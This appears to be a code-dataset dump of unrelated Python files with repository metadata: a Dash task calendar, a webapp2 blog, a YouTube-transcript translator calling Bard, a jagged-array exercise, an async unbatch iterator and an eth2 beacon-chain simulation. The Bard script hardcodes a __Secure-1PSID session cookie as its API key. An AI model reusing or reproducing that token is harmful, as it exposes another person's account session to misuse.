if counter > 1:
message = f"[{text}] You can only declare 1 {text.lower()} (provided: `{counter}`)"
self._errors.append(message)
# We check components only if no error so far
if len(self._errors) > 0:
return
for component in self.components:
component.validate()
# ----------------------------------------
# Helpers: output
# ----------------------------------------
def _update_embed_with_dice_rolls(self, embed):
"""
Adds a `Dice` recap to the embed
:param Embed embed: The embed to update
"""
dice_per_sides = {}
for die in self.dice:
existing_list = dice_per_sides.get(die.sides, [])
existing_list.append(die.value)
dice_per_sides[die.sides] = existing_list
lines = []
total_score = 0
for sides, values in dice_per_sides.items():
line_score = sum(values)
total_score += line_score
string_values = [str(v) for v in values]
line = f"[{len(values)}d{sides}]({', '.join(string_values)}) = {line_score}"
lines.append(line)
lines.append(f"# {total_score}")
text = generate_discord_markdown_string(lines)
embed.add_field(
name="Dice rolls",
value=text,
inline=False,
)
| Jordan-Kowal/discord-dice-roller | discord_dice_roller/utils/dice_roll.py | dice_roll.py | py | 23,842 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "re.compile",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 20,
... |
75065242274 | import dash
from dash_core_components.Tabs import Tabs
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output, State
import plotly.express as px
import datetime
import pandas as pd
import base64
# Python scripts
import aux_ as aux
import tasks
import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# import ../db.py
from calendar_class import Calendar
calendar = Calendar()
calendar.auto_schedule = True
now = datetime.datetime.now()
str_date = datetime.datetime.strftime(now, '%Y/%m/%d')
# App settings
app = dash.Dash(__name__,suppress_callback_exceptions=True,meta_tags=[{"name": "viewport", "content": "width=device-width, initial-scale=1"}])
app.title = aux.APP_TITLE
app.layout = html.Div([html.Br(),html.Div([html.H1(aux.APP_TITLE)],style={'text-align':'center'}),html.Br(),
dcc.Tabs(id="tabs-styled-with-inline", value='today', children=[
dcc.Tab(label='Què he de fer avui?', value='avui', style=aux.tab_style, selected_style=aux.tab_selected_style),
dcc.Tab(label='Afegeix tasca', value='add_task', style=aux.tab_style, selected_style=aux.tab_selected_style),
dcc.Tab(label='El meu perfil', value='profile', style=aux.tab_style, selected_style=aux.tab_selected_style),
], style=aux.tabs_styles),
html.Div(id='tabs-content-inline')
])
###############################################
# TASKS
###############################################
@app.callback(
Output("tabs-styled-with-inline", "value"),
[Input("submit-entry", "n_clicks")],
[
State("select-subject", "value"),
State("select-activity", "value"),
State("enter-task", "value"),
State("enter-hours", "value"),
State("date-picker", "date"),
State("enter-time", "value"),
],
)
def register(submit_entry, select_subject, select_activity, enter_task, enter_hours,date_picker, enter_time):
if submit_entry:
date = date_picker.replace("-", "/")
calendar.add_deadline(select_subject, select_activity, enter_task, date, enter_time, dedication=enter_hours)
#print(submit_entry, select_subject, select_activity, enter_task, enter_hours, date_picker, enter_time)
print(calendar.get_schedule())
return "today"
raise dash.exceptions.PreventUpdate
###############################################
# TODAY
###############################################
@app.callback(dash.dependencies.Output('label1', 'children'),
[dash.dependencies.Input('interval1', 'n_intervals')])
def update_interval(n):
now = datetime.datetime.now()
now += datetime.timedelta(hours= 12)
return now
def state(str_date, hour):
res = []
for time,task in calendar.schedule[str_date].items():
time = int(time[0:2])
if hour == time:
res.append(aux.red_button_style)
elif hour < time:
res.append(aux.normal_button_style)
elif hour > time:
res.append(aux.ended_button_style)
return res
LLISTA = []
a = [dash.dependencies.Output('TIME', 'figure')] + LLISTA
@app.callback(a,
[dash.dependencies.Input('label1', 'children')])
def time_clock(now):
time = now[11:19]
global str_date
str_date = now[0:10].replace("-", "/")
min = int(time[-5:-3])
hour = int(time[-8:-6])
fet = min/60*100
falta = 100 - fet
data = [['% Completat', fet],['% Pendent', falta]]
df = pd.DataFrame(data,columns = ['Etiqueta', 'Percentatge'])
fig = px.pie(df, hover_name="Etiqueta", hover_data={'Etiqueta':False,'Percentatge':False}, values='Percentatge', names='Etiqueta', color_discrete_sequence=["#00CC96","rgb(246,246,246)"])
fig.update(layout_showlegend=False)
fig.update_traces(textinfo='none',sort=False)
global a
if str_date in calendar.schedule.keys():
LLISTA = [dash.dependencies.Output(f"t{task.date_time}", 'style') for _, task in calendar.schedule[str_date].items()]
a = [dash.dependencies.Output('TIME', 'figure')] + LLISTA
print(len(a))
print(len(LLISTA))
print(type(LLISTA))
print(len([fig] + state(str_date, hour)))
else:
a = [dash.dependencies.Output('TIME', 'figure')] + []
return [fig] + state(str_date, hour)
# MAIN
@app.callback(Output('tabs-content-inline', 'children'),
Input('tabs-styled-with-inline', 'value'))
def render_content(tab):
if tab == 'avui':
now = datetime.datetime.now()
now += datetime.timedelta(hours= 12) #BORRAR
str_date = datetime.datetime.strftime(now, '%Y/%m/%d')
lst=[]
if str_date not in calendar.schedule.keys():
return html.Div([html.Div([html.H1("No tens res a fer avui!")],style={'text-align':'center'}), html.Img(src=aux.b64_image("img/felicitats!.png"))], style={'height':'70%','text-align':'center'})
for hour, task in calendar.schedule[str_date].items():
lst.append( html.Div([html.Button(hour + " - "+ task.name, id=str(task.date_time),style=aux.normal_button_style),html.Br(),html.Br()]))
return html.Div([html.Div([
html.Div([html.Div([html.H2("Tasques:"),html.Div(lst)], style={'marginLeft': "5%",'marginRight': "5%"})], style={'width':'40%','text-align':'left','backgroundColor': 'rgb(153,153,153)','marginTop': 22,'marginBottom': 60,'marginLeft': 10}),
html.Div([
html.Div([dcc.Interval(id='interval1', interval=1000, n_intervals=0),html.Br(),html.H1(id='label1', children='',style={ 'textAlign': 'center', 'color': 'black'})]),
dcc.Graph(id='TIME')], style={'width':'60%','text-align':'center'})],style={'display':'flex'}
),html.Div([html.Div("hl")], style={'width':'50%','text-align':'right'})])
elif tab == 'add_task':
return tasks.tasks_tab()
elif tab == 'profile':
return
if __name__ == '__main__':
app.run_server(debug=True) | danaecanillas/Calendari_TEA | app/app_nofunciona.py | app_nofunciona.py | py | 6,022 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_num... |
24142497222 | import webapp2
import jinja2
import os
from google.appengine.ext import db
template_dir = os.path.join(os.path.dirname(__file__), "templates")
jinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),
autoescape=True)
class Entry(db.Model):
title = db.StringProperty(required = True)
content = db.TextProperty(required=True)
created = db.DateTimeProperty(auto_now_add=True)
class Handler(webapp2.RequestHandler):
def write(self, *a, **kw):
self.response.out.write(*a, **kw)
def render_str(self,template,**params):
t=jinja_env.get_template(template)
return t.render(params)
def render(self,template,**kw):
self.write(self.render_str(template, **kw))
class MainPage(Handler):
def get(self):
self.redirect('/blog')
class BlogHome(Handler):
def render_base(self, title="", content="", error=""):
entries=db.GqlQuery("SELECT * from Entry ORDER BY created DESC LIMIT 5")
self.render("blog.html", title=title, content=content, error=error, entries=entries)
def get(self):
self.render_base()
def post(self):
title=self.request.get("title")
content=self.request.get("content")
if title and content:
a=Entry(title=title, content=content)
a.put()
self.redirect("/")
else:
error="Need both title and content"
self.render_base(title, content, error=error)
class NewPost(Handler):
def get(self, title="", content="", error=""):
self.render("newpost.html")
def post(self):
title = self.request.get("title")
content = self.request.get("content")
if title and content:
a=Entry(title=title, content=content)
a.put()
self.redirect("/blog/"+str(a.key().id()))
else:
error="Need both title and content"
self.render("newpost.html",title=title, content=content, error=error)
class ViewPostHandler(Handler):
def get(self,id):
entry=Entry.get_by_id(int(id), parent=None)
self.render("individual_post.html",title=entry.title,content=entry.content)
app = webapp2.WSGIApplication([
('/', MainPage),
('/newpost', NewPost),
('/blog',BlogHome),
webapp2.Route('/blog/<id:\d+>', ViewPostHandler)
], debug=True)
| johnmccorkell/build-a-blog | main.py | main.py | py | 2,398 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.join",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "jinja2.Environment",
"line... |
31093817853 | from youtube_transcript_api import YouTubeTranscriptApi
from bardapi import Bard
import os
import requests
import pytube
#important notes: This tools can only translate upto a 2000 word transript or a 10 minutes videos
#using dsdaniel park bardapi
#the link: https://github.com/dsdanielpark/Bard-API
#code
#input youtube video link
link = input("Youtube video link: ")
source = link + "?cc_load_policy=1"
yt = pytube.YouTube(source)
#divide the link into to part and only take the video id link into id
id = source.split("v=", 2)[-1]
#check all the captions that was available or the videos has turn off caption
cc = YouTubeTranscriptApi.list_transcripts(id)
#print the available language
print("id: ", id, "\n")
print("available language: ")
for i, df in enumerate(cc):
print(df)
#ngôn ngữ muốn đọc phụ đề
lang = input("Language that you want to read from (iso 639-1 code): ")
#lấy phụ đề về và để trong transcript
transcript = YouTubeTranscriptApi.get_transcript(id,languages=[lang, 'vi']) #second language is vietnamese
#write the whole transcript into lyrics.txt
with open("lyrics.txt", "w", encoding = 'utf-8') as f:
for subtitle in transcript:
text = subtitle['text']
start = subtitle['start']
duration = subtitle['duration']
f.write(f"{text}\n") #if you want to write a timeline u can add {start} -> {start+duration} but when using bard it'll usually fail to translate
f.close()
#mở file để đọc
f = open("lyrics.txt", "r")
#add the token. You can use your at __Secure-1PSID in bard.google.com
os.environ['_BARD_API_KEY'] = 'YQiLtpIxwMX_V3gqKce011fmUyY9L_KCvlyUITEhuhTLUa7RmNPGUwC8ta-nvEhwfuOi6A.'
token = 'YQiLtpIxwMX_V3gqKce011fmUyY9L_KCvlyUITEhuhTLUa7RmNPGUwC8ta-nvEhwfuOi6A.'
#this code is to make bard continue from the old conversation
session = requests.Session()
session.headers = {
"Host": "bard.google.com",
"X-Same-Domain": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 OPR/88.0.4390.60",
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"Origin": "https://bard.google.com",
"Referer": "https://bard.google.com/",
}
session.cookies.set("__Secure-1PSID", token)
#start bard
bard = Bard(token=token, session=session)
#You should request bard to translate with the same language that you want to translate to
bard.get_answer("dịch giúp tôi một đoạn văn sang tiếng việt được không")
#give the subtitle to bard
ans = bard.get_answer(f.read())['content']
#close the .txt file after using
f.close()
#print the answer
print(ans)
| huype1/playing-w-yt-and-bard | YT_translate_to_vietnamese.py | YT_translate_to_vietnamese.py | py | 2,807 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pytube.YouTube",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "youtube_transcript_api.YouTubeTranscriptApi.list_transcripts",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "youtube_transcript_api.YouTubeTranscriptApi",
"line_number": 20,
... |
42744791584 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
import pandas as pd
import math as mt
from IPython.display import Markdown, display
def printmd(string):
display(Markdown(string))
# In[2]:
def DectoBin(num):
x = np.absolute(num)
Bin = ""
for i in range(1,33):
if x > 1:
Bin = (str)(x%2) + Bin
x = (int)(x/2)
elif x <= 1:
Bin = (str)(x%2) + Bin
x = 0
else:
Bin = (str)(0) + Bin
compActive = 0
if(num < 0):
for i in range(31,-1,-1):
if compActive == 0 and Bin[i] == '1':
compActive = 1
elif compActive == 1:
twoscomp = ((int)(Bin[i]) - 1)**2
lst = list(Bin)
lst[i] = str(twoscomp)
Bin = "".join(lst)
return (str)(Bin)
def BintoDec(num):
sum = 0
if(num[0] == "0"):
for i in range(1,33):
sum = sum + (int((num[len(num)-i]))*(2**(i-1)))
return sum
else:
for i in range(1,32):
sum = sum + (int((num[len(num)-i]))*(2**(i-1)))
sum = sum - (int((num[0]))*(2**(31)))
return sum
class MyJaggedArray:
def __init__(self,JALen):
self.mem = [None]*(JALen*40)
self.JALen = JALen
self.inArrLenArr = [0]*JALen
i = 0
while (i < self.JALen):
inArrLen = int(input(f"Enter {i+1} Array Length :"))
if(inArrLen <= 10 and inArrLen > 0):
self.inArrLenArr[i] = inArrLen
for j in range(0,inArrLen):
data = int(input(f"Enter {i+1}, {j+1} Values : "))
data = DectoBin(data)
self.setValuestoMem(data,((i*40)+(j*4)))
else:
print("Lenght must be between 1 to 10")
i = i -1
i = i+1
def setValuestoMem(self,data,index):
count = 0
for i in range(0,4):
self.mem[index+i] = data[count:count+8]
count = count + 8
def getAllValues(self):
printmd("<span style='color:green; font-size:22px'><b>My Jagged Array Values</b></span>")
for i in range(0,self.JALen):
print(f"Base Address is :",(i*40))
for j in range(0,self.inArrLenArr[i]):
val = self.mem[((i*40)+(j*4))]
val = val + self.mem[((i*40)+(j*4))+1]
val = val + self.mem[((i*40)+(j*4))+2]
val = val + self.mem[((i*40)+(j*4))+3]
print(BintoDec(val) , end =" ")
print("")
def printMem(self):
printmd("<span style='color:green; font-size:22px'><b>Memory</b></span>")
for i in range(0,len(self.mem)):
print(self.mem[i])
# In[3]:
while True:
JALen = int(input("Enter Jaggaed Array Length : "))
if JALen <= 0 or JALen > 10:
print("Jagged Array Length must be Between 1 to 10")
else:
break
obj = MyJaggedArray(JALen)
obj.getAllValues()
# In[4]:
obj.printMem()
# In[ ]:
| shahmeerrajput/WorkOnTensorflowNmpyPandas | DS Project Working.py | DS Project Working.py | py | 3,162 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "IPython.display.display",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "IPython.display.Markdown",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.absolute",
"line_number": 19,
"usage_type": "call"
}
] |
24946960553 | from selenium import webdriver
from time import sleep
from selenium.webdriver import Keys
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
chrome_options = Options()
chrome_options.add_argument("--headless") # Chạy trình duyệt ẩn danh
browser = webdriver.Chrome()
browser.get("https://services.ca.judiciary.gov.ph/recentdecisions/")
sleep(3)
select50 = browser.find_element(By.XPATH, "/html/body/center/div[3]/form/div/div[3]/select/option[4]")
select50.click()
sleep(1)
viewPDF = browser.find_element(By.XPATH,"/html/body/center/div[3]/form/div/div[2]/table/tbody/tr[1]/td[4]")
viewPDF.click()
sleep(2)
browser.find_element(By.XPATH,'/html/body').send_keys(Keys.CONTROL, 's')
page_content = browser.page_source
# Lưu nội dung vào tệp tin
with open('1.pdf', 'w', encoding='utf-8') as file:
file.write(page_content)
sleep(10)
browser.quit()
| Namgiangvt12/Upwork | 50.0478-multithread.py | 50.0478-multithread.py | py | 911 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "selenium.webdriver.chrome.options.Options",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 11,
"usage_type": "name"
},
{
... |
12698763875 | import math
import soundfile as sf
import numpy as np
#import librosa
data, samplerate = sf.read('sineAmend.wav')
channels = len(data.shape)
length_s = len(data)/float(samplerate)
if (length_s < 6.0):
n = math.ceil(6*samplerate/len(data))
if (channels == 2):
data = np.tile(data, (n,1))
else:
data = np.tile(data,n)
sf.write('new.wav', data, samplerate)
| Shri-0/Pedalboard-Shri | Py/PedalBoard/Sessions/PB-repeatAudio.py | PB-repeatAudio.py | py | 370 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "soundfile.read",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "math.ceil",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.tile",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.tile",
"line_number": 16... |
17745879141 | import aioitertools
import copy
class _SampleIterator:
_none = object()
def __init__(self, sample):
self._iters = [iter(t) for t in sample]
def __iter__(self):
return self
def __next__(self):
sample = tuple(next(t, self._none) for t in self._iters)
if any(map(lambda s: s is self._none, sample)):
raise StopIteration()
else:
return tuple(copy.deepcopy(s) for s in sample)
class _UnBatchIterator:
_none = object()
def __init__(self, source_iter):
self._source_iter = source_iter
self._batch = None
self._squeeze = None
def __aiter__(self):
return self
async def __anext__(self):
while self._source_iter is not None:
if self._batch is None:
try:
sample = await aioitertools.next(self._source_iter)
is_tuple = isinstance(sample, tuple)
if not is_tuple:
sample = (sample,)
self._batch = _SampleIterator(sample)
self._squeeze = not is_tuple
except StopAsyncIteration:
self._source_iter = None
raise
try:
sample = next(self._batch)
return sample[0] if self._squeeze else sample
except StopIteration:
self._batch = None
else:
raise StopAsyncIteration()
class UnBatchDataOperation:
def __init__(self, *, source):
self._source = source
def get_iter(self, session_id):
return _UnBatchIterator(self._source.get_iter(session_id))
| isushik94/pytorch-data-api | src/torch_data/_ops/_unbatch.py | _unbatch.py | py | 1,695 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "copy.deepcopy",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "aioitertools.next",
"line_number": 38,
"usage_type": "call"
}
] |
1405363679 | import requests
import json
x = requests.get("https://gist.githubusercontent.com/D-Brox/5ea0d9cec29c4921a9e397163f447646/raw/classes2.txt")
e = x.text.split("\n")
b = {}
for i in e:
a = i.split(" = ")[::-1]
try:
b[a[0]] = a[1]
except:
print(i)
with open("classes.json", "w") as f:
json.dump(b, f) | captain8771-plugins/append-old-classnames | download classnames.py | download classnames.py | py | 328 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 13,
"usage_type": "call"
}
] |
29544552626 | import time
import ssz
import py_ecc.bls as bls
from eth2.beacon._utils.hash import hash_eth2
from eth2.beacon.on_genesis import (
get_genesis_block,
)
from eth2.beacon.state_machines.forks.serenity.blocks import (
SerenityBeaconBlock,
)
from eth2.beacon.state_machines.forks.serenity.configs import SERENITY_CONFIG
from eth2.beacon.types.states import BeaconState
from beacon_utils import ( # noqa: F401
generate_genesis_state,
)
from networksim import (
NetworkSimulator,
)
from progress import progress
from sim_config import Config as p
from validator import Validator
#
# Global variables
#
privkeys = tuple(int.from_bytes(
hash_eth2(str(i).encode('utf-8'))[:4], 'big')
for i in range(p.NUM_VALIDATORS)
)
keymap = {} # pub -> priv
for i, k in enumerate(privkeys):
keymap[bls.privtopub(k)] = k
if i % 50 == 0:
print("Generated %d keys" % i)
pubkeys = list(keymap)
def simulation():
# Initialize NetworkSimulator
network = NetworkSimulator(latency=p.LATENCY, reliability=p.RELIABILITY)
network.time = p.INITIAL_TIMESTAMP
# 1. Create genesis state
print('Creating genesis state')
config = SERENITY_CONFIG
# Something bad. :'(
config = config._replace(
SLOTS_PER_EPOCH=p.SLOTS_PER_EPOCH,
GENESIS_SLOT=2**32,
GENESIS_EPOCH=2**32 // p.SLOTS_PER_EPOCH,
TARGET_COMMITTEE_SIZE=8,
SHARD_COUNT=16,
MIN_ATTESTATION_INCLUSION_DELAY=2,
)
# Write to file
if p.GENERATE_STATE:
generate_genesis_state(config, keymap, p.NUM_VALIDATORS)
with open('hundred_validators_state.txt', 'r') as f:
state_bytes = f.read()
state_bytes = bytes.fromhex(state_bytes)
genesis_state = ssz.decode(state_bytes, BeaconState)
genesis_block = get_genesis_block(
genesis_state.root,
genesis_slot=config.GENESIS_SLOT,
block_class=SerenityBeaconBlock,
)
print('Genesis state created')
validators = [
Validator(
config,
genesis_state,
genesis_block,
index,
privkey,
pubkey,
network,
time_offset=p.TIME_OFFSET,
)
for index, (pubkey, privkey) in enumerate(keymap.items())
]
# 2. Set NetworkSimulator n
network.agents = validators
network.generate_peers(num_peers=p.NUM_PEERS)
# 3. tick
start_time = time.time()
print(
f'start head block slot = {validators[0].chain.get_canonical_head().slot}'
)
def print_result():
print('------ [Simulation End] ------')
print('====== Parameters ======')
print('------ Measuration Parameters ------')
print('Total ticks: {}'.format(p.TOTAL_TICKS))
print('Simulation precision: {}'.format(p.PRECISION))
print('------ System Parameters ------')
print('Total validators num: {}'.format(p.NUM_VALIDATORS))
print('------ Network Parameters ------')
print('Network latency: {} sec'.format(p.LATENCY * p.PRECISION))
print('Network reliability: {}'.format(p.RELIABILITY))
print('Number of peers: {}'.format(p.NUM_PEERS))
print('Number of shard peers: {}'.format(p.SHARD_NUM_PEERS))
print('Target total shards TPS: {}'.format(p.TARGET_TOTAL_TPS))
print('Mean tx arrival time: {}'.format(p.MEAN_TX_ARRIVAL_TIME))
print('------ Validator Parameters ------')
print('Validator clock offset: {}'.format(p.TIME_OFFSET))
print('Probability of validator failure to make a block: {}'.format(
p.PROB_CREATE_BLOCK_SUCCESS
))
print('------ Result ------')
# print_status()
print("--- %s seconds ---" % (time.time() - start_time))
try:
for i in range(p.TOTAL_TICKS):
# Print progress bar in stderr
progress(i, p.TOTAL_TICKS, status='Simulating.....')
network.tick()
if i % 100 == 0:
print('%d ticks passed' % i)
# print_status()
except Exception:
raise
finally:
print_result()
print('[END]')
return
if __name__ == "__main__":
simulation()
| hwwhww/trinity | eth2_sim/simulation/run.py | run.py | py | 4,210 | python | en | code | null | github-code | 1 | [
{
"api_name": "eth2.beacon._utils.hash.hash_eth2",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "sim_config.Config.NUM_VALIDATORS",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "sim_config.Config",
"line_number": 31,
"usage_type": "name"
},
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.